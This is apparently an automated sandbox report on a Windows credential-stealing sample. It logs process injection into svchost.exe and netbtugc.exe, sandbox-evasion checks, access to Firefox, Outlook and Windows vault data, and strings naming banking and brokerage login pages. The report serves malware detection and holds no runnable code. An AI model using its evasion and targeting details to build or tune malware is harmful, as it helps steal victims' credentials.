            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C851CD
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C9A67C
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C8648E
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C142A2
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeFile created: C:\Users\user\AppData\Local\Temp\resharpenJump to behavior
            Source: BP-50C26_20241220_082241.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028FF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4506373948.0000000002920000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4506373948.0000000002955000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2372684776.0000000002920000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2372684776.0000000002955000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: BP-50C26_20241220_082241.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"Jump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: BP-50C26_20241220_082241.exeStatic file information: File size 1565696 > 1048576
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: BP-50C26_20241220_082241.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111344894.000000000093E000.00000002.00000001.01000000.00000004.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4506386913.000000000093E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: BP-50C26_20241220_082241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: BP-50C26_20241220_082241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: BP-50C26_20241220_082241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: BP-50C26_20241220_082241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: BP-50C26_20241220_082241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C322CB push ds; ret 0_2_00C322E2
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C30A76 push ecx; ret 0_2_00C30A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350225F pushad ; ret 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035027FA pushad ; ret 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx2_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350283D push eax; iretd 2_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350135E push eax; iretd 2_2_03501369
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F1C2E9 push FFFFFFBAh; ret 3_2_02F1C2EB
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F1129D push ebx; ret 3_2_02F1129E
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F1324A push ebx; iretd 3_2_02F13271
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F130A7 push ebx; iretd 3_2_02F13271
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F11903 pushad ; retf 3_2_02F11904
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F16F2B push 00000038h; iretd 3_2_02F16F2F
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02EFD51A push esp; ret 3_2_02EFD51B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030B09AD push ecx; mov dword ptr [esp], ecx4_2_030B09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02812238 pushad ; iretd 4_2_02812239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281AB37 push 00000038h; iretd 4_2_0281AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02810EAB push ebp; retf 4_2_02810EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02816E56 push ebx; iretd 4_2_02816E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02816CB3 push ebx; iretd 4_2_02816E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281101F push es; iretd 4_2_02811027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281D1B0 push es; ret 4_2_0281D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02801126 push esp; ret 4_2_02801127
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C2F98E
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00CA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CA1C41
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97450
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeAPI/Special instruction interceptor: Address: 14E2B24
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 784Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9188Jump to behavior
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128Thread sleep count: 784 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128Thread sleep time: -1568000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128Thread sleep count: 9188 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128Thread sleep time: -18376000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe TID: 5268Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe TID: 5268Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe TID: 5268Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C4C2A2 FindFirstFileExW,0_2_00C4C2A2
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C868EE FindFirstFileW,FindClose,0_2_00C868EE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C8698F
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D076
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D3A9
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C89642
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C8979D
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DBBE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C89B2B
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C85C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0281BAB0
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000007.00000002.2477684921.00000275F5B1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4506940651.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
